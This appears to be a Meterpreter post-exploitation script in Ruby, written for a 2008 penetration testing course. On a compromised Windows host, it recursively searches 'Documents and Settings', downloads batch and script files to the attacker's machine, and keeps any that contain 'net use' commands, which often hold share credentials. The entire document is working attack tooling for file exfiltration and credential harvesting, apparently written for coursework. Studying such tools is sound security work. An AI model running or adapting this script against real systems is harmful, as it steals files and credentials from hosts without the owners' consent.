##Stephen Komal & Ronald Gutierrez ## CS 6573- Penetration Testing & Vulnerability Analysis ## Date: November 20, 2008 # Get arguments #remote directory to start looking in $basedir = args[0] || "C:\\Documents and Settings" #file where the output of the search will be directed to $output_file = args[1] || "/tmp/output_net_use.txt" # Filters filters = { 'files' => '\.(vb|vbs|com|cmd|bat)$', # If you encounter any access errors when trying to open a file # Add the file to the exceptions # Ex. If I wanted to ignore any files/directories that are inside of Program Files # and also any file called wakawaka.txt I would make my exceptions value as follows # # 'exceptions' => '(System Volume Information|wakawaka.txt)' # # Note: The pattern machines is case insensitive 'exceptions' => '(System Volume Information)', 'free' => args[2] } # Function scan() def scan(path) client.fs.dir.foreach(path) {|x| fullpath = path + '\\' + x # If file or dir matches an exception .. skip it if fullpath =~ /#{$exceptions}/i print_line( "Skipping #{path}\\#{x}" ) next end # 0 if the file doesn't contain net use cmds # 1 if the file does contain net use cmds # prevents us from deleting those files that contain net use cmds flag = 0; next if x =~ /^(\.|\.\.)$/ # Look in the file's props, if it is a directory, keep going deeper if client.fs.file.stat(fullpath).directory? # For Debugging purposes print_line( "Working on #{fullpath}" ) scan(fullpath) # Else if the file is not a directory, and it ends with a specified file extension, then perform the following operations elsif fullpath =~ /#{$motif}/i # Replace ':' or '%' or '\' by '_' dst = fullpath.tr_s(":|\s|\%|\\", "_") dst = ::Dir.tmpdir + ::File::Separator + dst print_line("Downloading '#{fullpath}' to '#{dst}'") client.fs.file.download_file(dst, fullpath) # Now that we have the file, we can search for the net use strings ::File.open(dst, "r") do |f| out = ::File.open($output_file, ::File::WRONLY | ::File::APPEND | ::File::CREAT) f.grep( /net use/i ) do |line| flag = 1; out.puts "#{dst}: #{line}\n" puts "#{dst}: #{line}\n" end #f.close end # only delete those files that don't have have the net use cmd # we keep those that do, in the case that they have extra information the attacker may want if flag == 0 ::File.delete(dst) end end } end # Set the regexp $motif = filters['files'] $exceptions = filters['exceptions'] print_line( "[*] Starting Scan on #{$basedir}" ) # Search and download and grep scan($basedir) print_line( "[*] Scan finished.. Results logged to #{$output_file}" )